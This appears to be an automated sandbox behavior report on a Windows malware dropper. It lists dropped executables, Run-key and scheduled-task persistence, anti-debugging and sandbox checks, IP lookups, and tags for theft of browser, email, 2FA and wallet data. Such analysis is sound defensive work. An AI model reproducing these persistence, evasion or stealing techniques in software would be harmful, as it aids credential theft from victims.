N/A N/A C:\Users\Admin\AppData\Local\Temp\148B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\75CF.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build2.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\6675.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\6675.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NRU1I.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NRU1I.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NRU1I.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NRU1I.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\ProgramData\4676496.exe N/A
N/A N/A C:\ProgramData\4676496.exe N/A
N/A N/A C:\ProgramData\8557825.exe N/A
N/A N/A C:\ProgramData\8557825.exe N/A
N/A N/A C:\ProgramData\1596296.exe N/A
N/A N/A C:\ProgramData\1596296.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\ProgramData\3769868.exe N/A
N/A N/A C:\ProgramData\3769868.exe N/A
N/A N/A C:\ProgramData\4676496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\ProgramData\8557825.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\ProgramData\8557825.exe N/A
N/A N/A C:\ProgramData\8557825.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" C:\ProgramData\4676496.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Jaezhalicola.exe\"" C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\56d53bef-448b-4e4b-bcff-61fbea280644\\3F15.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\3F15.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\6675.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6675.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-JV285.tmp\setup_2.tmp N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe C:\Users\Admin\AppData\Local\Temp\is-TFGKB.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-GE16E.tmp C:\Users\Admin\AppData\Local\Temp\is-TFGKB.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\Google\Jaezhalicola.exe C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build3.exe N/A
File created C:\Program Files (x86)\Google\Jaezhalicola.exe.config C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build3.exe N/A
File created C:\Program Files\7-Zip\WJIDREWJFA\ultramediaburner.exe C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build3.exe N/A
File created C:\Program Files\7-Zip\WJIDREWJFA\ultramediaburner.exe.config C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build3.exe N/A
File created C:\Program Files (x86)\FarLabUninstaller\is-GF11Q.tmp C:\Users\Admin\AppData\Local\Temp\is-JV285.tmp\setup_2.tmp N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-TFGKB.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-2E3OJ.tmp C:\Users\Admin\AppData\Local\Temp\is-TFGKB.tmp\ultramediaburner.tmp N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-TFGKB.tmp\ultramediaburner.tmp N/A
File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-JV285.tmp\setup_2.tmp N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI651.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9A5E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC557.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA97C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f7876f6.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFFAB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1A4E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6D91.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3F0F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI83E0.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB791.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7876f8.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7876f4.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f7876f4.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAB42.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIEB41.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA641.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAFF4.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3F10.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7876f6.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8E6C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8C3B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB468.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2A37.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA9AB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\96C8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\96C8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\z9Jllew4h.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\z9Jllew4h.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\80ce8312-9c8a-4568-93f1-dbc35be65a3b\build2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ja-JP = "ja-JP.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\Total = "47" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "75" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\Total = "90" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "47" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "1393" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\ = "1309" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\Total = "1393" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0c1d9854da7d701 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\ = "28" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\Total = "75" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\ = "1393" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "9" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\ = "0" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\ = "47" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "122" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\ = "122" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
